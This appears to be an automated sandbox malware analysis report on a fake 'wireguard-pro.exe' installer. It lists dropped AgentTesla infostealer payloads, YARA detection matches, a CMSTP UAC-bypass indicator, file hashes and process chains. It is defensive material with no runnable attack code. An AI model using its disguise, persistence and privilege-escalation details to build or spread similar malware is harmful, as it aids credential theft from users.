Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06783E9C	3_2_06783E9C
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06783FE7	3_2_06783FE7
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06783BD1	3_2_06783BD1
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EA52A3	3_2_06EA52A3
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EA7B10	3_2_06EA7B10
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EAE810	3_2_06EAE810
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EA5990	3_2_06EA5990
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EAC978	3_2_06EAC978
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EA3541	3_2_06EA3541
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EA7B0B	3_2_06EA7B0B
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EA0040	3_2_06EA0040
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EA0021	3_2_06EA0021
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EA598F	3_2_06EA598F
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06EAC977	3_2_06EAC977
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_070B0040	3_2_070B0040
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_070BCAE0	3_2_070BCAE0
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_074A8028	3_2_074A8028
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_074A8038	3_2_074A8038
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_012A3BE0	17_2_012A3BE0
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_012A4031	17_2_012A4031
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_012A3FE7	17_2_012A3FE7
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_012A3E9C	17_2_012A3E9C
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_02C18900	17_2_02C18900
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_02C12E41	17_2_02C12E41
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_02C1D5EC	17_2_02C1D5EC
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_02C17CE8	17_2_02C17CE8
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_02C18030	17_2_02C18030
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_02C1EAF1	17_2_02C1EAF1
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_02C15370	17_2_02C15370
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_02C1DE08	17_2_02C1DE08
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 17_2_02C1DDF9	17_2_02C1DDF9
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_02EBEAD1	18_2_02EBEAD1
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_02EB8900	18_2_02EB8900
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_02EBD5EC	18_2_02EBD5EC
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_02EB7CE8	18_2_02EB7CE8
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_02EB8030	18_2_02EB8030
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_02EB0434	18_2_02EB0434
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_02EB5370	18_2_02EB5370
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_02EBDE08	18_2_02EBDE08
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_02EBDD41	18_2_02EBDD41
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06395298	18_2_06395298
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06397B10	18_2_06397B10
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0639E810	18_2_0639E810
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0639C978	18_2_0639C978
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06395990	18_2_06395990
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06397B03	18_2_06397B03
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0639001F	18_2_0639001F
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06390040	18_2_06390040
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0639C969	18_2_0639C969
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06395981	18_2_06395981
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0697A2B8	18_2_0697A2B8
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0697BE60	18_2_0697BE60
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06973BE0	18_2_06973BE0
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0697B828	18_2_0697B828
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06974031	18_2_06974031
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06973E9C	18_2_06973E9C
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06973FE7	18_2_06973FE7
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_06973BD1	18_2_06973BD1
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0712B298	18_2_0712B298
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_07125F70	18_2_07125F70
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0712EAD0	18_2_0712EAD0
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0712EAD0	18_2_0712EAD0
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_07130040	18_2_07130040
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Code function: 18_2_0713C6E0	18_2_0713C6E0

Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll

Source: Joe Sandbox View	Dropped File: C:\Program Files\WireGuard\wg.exe F6CFCDD6933B5D50CD2446BF8CA611C1CF9E825A0FBA13DB13DFE4D24EEC37B9
Source: Joe Sandbox View	Dropped File: C:\Program Files\WireGuard\wireguard.exe 32717D15B57965ADF78B33F61DB32CB26E11759DD78D441A218DD349C731A160
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe EEEE2B0A6AD1C7E4614FED4DFBE58B63776F6A3A6758267B5A976B4DC4315F48

Source: wireguard-pro.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 9.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: wireguard-pro.exe PID: 7080, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, version = stealer, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a
Source: Process Memory Space: HQL82NEF.exe PID: 5160, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, version = stealer, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a
Source: Process Memory Space: audddd.exe PID: 7812, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, version = stealer, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Program Files\WireGuard\wireguard.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

File deleted: C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\51c6ff.msi

Source: wireguard.exe.4.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: wireguard.exe.4.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewireguard-installer.exe4 vs wireguard-pro.exe
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs wireguard-pro.exe
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefirefox_f4.exe4 vs wireguard-pro.exe
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameZWFCTULIFEJSVRXLECMXBNOCDPQMEGPQMUTJOXTI.exe4 vs wireguard-pro.exe
Source: wireguard-pro.exe, 00000000.00000002.618873616.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs wireguard-pro.exe

Source: wireguard-pro.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WireGuard.lnk.4.dr

LNK file: ..\..\..\..\..\Program Files\WireGuard\wireguard.exe

Source: C:\Users\user\Desktop\wireguard-pro.exe

File created: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Jump to behavior

Source: classification engine

Classification label: mal90.phis.troj.spyw.expl.evad.winEXE@24/53@34/7

Source: C:\Users\user\Desktop\wireguard-pro.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: HQL82NEF.exe.0.dr, JA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: audddd.exe.3.dr, JA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, JA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: wireguard-pro.exe, Program.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: wireguard-pro.exe, Program.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: C:\Program Files\WireGuard\wireguard.exe	File opened: C:\Windows\system32\66936478cb6e4172ca2387090817bd7d28653abaaf7f9683fca019e5bf8f1db0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Program Files\WireGuard\wireguard.exe	File opened: C:\Windows\system32\497c225e27d1f10df99fcbfa9eb5fa20afa68d610fd22016803cf420995be11bAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Program Files\WireGuard\wireguard.exe	File opened: C:\Windows\system32\ff6bbc44c1b3d08de09d7dc195fc6da9ebfe47fbec01a5eae0321f90ab184efeAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Program Files\WireGuard\wireguard.exe	File opened: C:\Windows\system32\1fdc2e6c4e2323674696f84acee1e12f7936ee3c034915b1f923e3a27bfe90c8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files\WireGuard

Source: wireguard-pro.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\wireguard-pro.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wireguard-pro.exe C:\Users\user\Desktop\wireguard-pro.exe
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process created: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe "C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe"
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe "C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 5AD05C264D17A520CC3AF28B9CDE51EF
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding CC7CB015DD9FB5BB407A6980FAC33728 E Global\MSI0000
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Program Files\WireGuard\wireguard.exe C:\Program Files\WireGuard\wireguard.exe
Source: C:\Program Files\WireGuard\wireguard.exe	Process created: C:\Program Files\WireGuard\wireguard.exe "C:\Program Files\WireGuard\wireguard.exe" /installmanagerservice
Source: unknown	Process created: C:\Program Files\WireGuard\wireguard.exe "C:\Program Files\WireGuard\wireguard.exe" /managerservice
Source: C:\Program Files\WireGuard\wireguard.exe	Process created: C:\Program Files\WireGuard\wireguard.exe "C:\Program Files\WireGuard\wireguard.exe" /ui 888 884 896 904
Source: unknown	Process created: C:\Users\user\AppData\Roaming\audddd\audddd.exe "C:\Users\user\AppData\Roaming\audddd\audddd.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\audddd\audddd.exe "C:\Users\user\AppData\Roaming\audddd\audddd.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process created: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe "C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe "C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe"	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 5AD05C264D17A520CC3AF28B9CDE51EF
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding CC7CB015DD9FB5BB407A6980FAC33728 E Global\MSI0000
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Program Files\WireGuard\wireguard.exe C:\Program Files\WireGuard\wireguard.exe
